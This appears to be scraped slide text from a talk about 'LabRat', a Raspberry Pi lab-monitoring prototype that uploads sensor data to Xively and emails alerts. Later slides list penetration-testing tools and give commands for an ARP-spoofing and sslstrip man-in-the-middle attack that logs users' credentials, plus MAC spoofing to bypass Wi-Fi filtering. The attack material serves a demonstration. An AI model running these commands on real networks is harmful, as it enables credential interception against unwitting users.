  • 11. Set up a Cosm (Now Xively) Account • Register on cosm (xively) and Add Device • You will Receive an API Key and FEED ID • Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
  • 12. Setting up the Python Script to send Data to Xively Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python- eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install Set up Python Script # source eeml package import eeml <snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
  • 13. The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
  • 14. The LabRat Prototype Python Scripts 1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics. 2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
  • 15. The LabRat Prototype Current List of Penetration-Testing Tools Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
  • 16. DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and macchanger - Packet Sniffing using Wireshark - Other MITM attacks
  • 17. Arp Spoofing and Mac-Spoofing Attacks Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward • Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address> • Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080 Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed devices> wlan0 • Ifconfig wlan0 up
  • 18. Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p